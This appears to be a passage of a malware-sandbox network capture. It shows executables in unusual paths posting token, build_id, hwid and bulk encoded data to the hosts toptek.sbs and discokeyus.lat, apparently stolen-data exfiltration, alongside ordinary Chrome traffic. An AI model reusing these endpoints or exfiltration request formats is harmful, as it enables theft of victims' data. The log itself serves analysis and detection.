                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC1390INData Raw: 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30
                                                                                                                                                                                                                                                            Data Ascii: I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u00
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC1390INData Raw: 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                            Data Ascii: e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a|0:void 0};_.Od\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC1390INData Raw: 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4e 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 50 64
                                                                                                                                                                                                                                                            Data Ascii: ){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return _.Nd(_.Ec(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.tb(_.be(a,b),c)};_.ce\u003dfunction(a,b,c\u003d0){return _.tb(_.S(a,b),c)};_.ee\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Pd
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC1390INData Raw: 65 4d 61 70 5c 22 2c 76 61 6c 69 67 6e 3a 5c 22 76 41 6c 69 67 6e 5c 22 2c 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 6c 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 3b 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 6d 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64
                                                                                                                                                                                                                                                            Data Ascii: eMap\",valign:\"vAlign\",width:\"width\"};\n_.le\u003dfunction(a){return a?a.defaultView:window};_.oe\u003dfunction(a,b){const c\u003db[1],d\u003d_.me(a,String(b[0]));c\u0026\u0026(typeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            25192.168.2.44984094.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:17 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----6F3E3ECTRI5FU3WT2D2D
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 489
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:17 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 36 46 33 45 33 45 43 54 52 49 35 46 55 33 57 54 32 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 36 46 33 45 33 45 43 54 52 49 35 46 55 33 57 54 32 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 36 46 33 45 33 45 43 54 52 49 35 46 55 33 57 54 32 44 32 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------6F3E3ECTRI5FU3WT2D2DContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------6F3E3ECTRI5FU3WT2D2DContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------6F3E3ECTRI5FU3WT2D2DCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            26192.168.2.449848142.250.181.1324437888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:17 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:18 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                            2024-12-21 21:17:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            27192.168.2.44986094.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:22 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----VAIMY5PP8Q9ZMYCT00RI
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 505
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:22 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 56 41 49 4d 59 35 50 50 38 51 39 5a 4d 59 43 54 30 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 56 41 49 4d 59 35 50 50 38 51 39 5a 4d 59 43 54 30 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 56 41 49 4d 59 35 50 50 38 51 39 5a 4d 59 43 54 30 30 52 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------VAIMY5PP8Q9ZMYCT00RIContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------VAIMY5PP8Q9ZMYCT00RIContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------VAIMY5PP8Q9ZMYCT00RICont
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:22 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            28192.168.2.449861104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:22 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=DWI2VZWBKFHBG
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18133
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:22 UTC15331OUTData Raw: 2d 2d 44 57 49 32 56 5a 57 42 4b 46 48 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 57 49 32 56 5a 57 42 4b 46 48 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 57 49 32 56 5a 57 42 4b 46 48 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 44 57 49 32 56 5a 57 42 4b 46 48
                                                                                                                                                                                                                                                            Data Ascii: --DWI2VZWBKFHBGContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--DWI2VZWBKFHBGContent-Disposition: form-data; name="pid"2--DWI2VZWBKFHBGContent-Disposition: form-data; name="lid"PsFKDg--pablo--DWI2VZWBKFH
                                                                                                                                                                                                                                                            2024-12-21 21:17:22 UTC2802OUTData Raw: 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc
                                                                                                                                                                                                                                                            Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:23 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=osl9colpi8alfjldurql8ei3fi; expires=Wed, 16 Apr 2025 15:04:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izsTrDuBWoklBIx7NwfSmkyxajRm8KqtJst85X1TBbsuHxMuMD7KGnbL989M0vwmw8mvR8pjbbTUJx48qT%2BisukkIs6lXDQk%2FZl0UbozCoS2iPT1Qp5k1q3DmXmNDjIGzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae60a5e3743bc-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1760&rtt_var=667&sent=16&recv=21&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19088&delivery_rate=1630374&cwnd=221&unsent_bytes=0&cid=311bc3a0911732ba&ts=996&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            29192.168.2.44986294.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JMOPHL6P8YM7YMOHD2NG
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 213453
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------JMOPHL6P8YM7YMOHD2NGContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------JMOPHL6P8YM7YMOHD2NGContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------JMOPHL6P8YM7YMOHD2NGCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                            Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                            2024-12-21 21:17:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
